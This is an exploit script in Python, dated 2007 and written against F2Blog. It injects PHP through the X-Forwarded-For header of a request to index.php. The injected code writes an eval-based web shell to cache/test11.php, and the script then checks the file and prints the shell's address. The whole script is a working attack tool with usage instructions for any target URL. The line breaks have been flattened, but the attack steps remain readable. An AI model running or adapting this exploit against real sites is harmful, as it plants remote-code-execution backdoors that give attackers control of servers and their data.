#!c:\python24\pyton # Exploit For F2Blog All Version # Author BY MSN:pt...@vip.sina.com # Date: Jan 29 2007
import sys import httplib from urlparse import urlparse from time import sleep
def injection(realurl,path,evil): #url,/bk/,evilip cmd="" cookie="" header={'Accept':'*/*','Accept-Language':'zh- cn','Referer':'http://'+realurl[1]+path+'index.php','Content- Type':'application/x-www-form-urlencoded','User- Agent':useragent,'Host':realurl[1],'Content-length':len(cmd), 'Connection':'Keep-Alive','X-Forwarded- For':evil,'Cookie':cookie} #cmd = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit= %E6%8F%90+%C2%A0+%E4%BA%A4" #print header #print path #sys.exit(1) http = httplib.HTTPConnection(realurl[1]) http.request("POST",path+"index.php",cmd, header) sleep(1) http1 = httplib.HTTPConnection(realurl[1]) http1.request("GET",path+"cache/test11.php") response = http1.getresponse() re1 = response.read() #print re1 print re1.find('test') if re1.find('test') ==0: print 'Expoilt Success!\n' print 'View Your shell:\t%s' %shell sys.exit(1);
else: sys.stdout.write("Expoilt FALSE!") http.close() #sleep(1) #break sys.stdout.write("\n")
def main (): print 'Exploit For F2Blog All Version' print 'Codz by pt...@vip.sina.com\n' if len(sys.argv) == 2: url = urlparse(sys.argv[1]) if url[2:-1] != '/': u = url[2] + '/' else: u = url[2] #u=/bk/ else: print "Usage: %s <url> " % sys.argv[0] print "Example: %s http://127.0.0.1/bk" % sys.argv[0] sys.exit(0)
print '[+] Connect %s' % url[1] print '[+] Trying...' print '[+] Plz wait a long long time...' global shell,useragent shell="http://"+url[1]+u+"cache/test11.php" query ='fputs(fopen(\'cache/test11.php\',\'w+\'),\'<? @eval($_REQUEST[c])?>test\')' query ='\'));'+query+';/*' evilip=query useragent="" cookie="" injection(url,u,evilip) evilip="" injection(url,u,evilip)
print '[+] Finished'
if __name__ == '__main__': main() |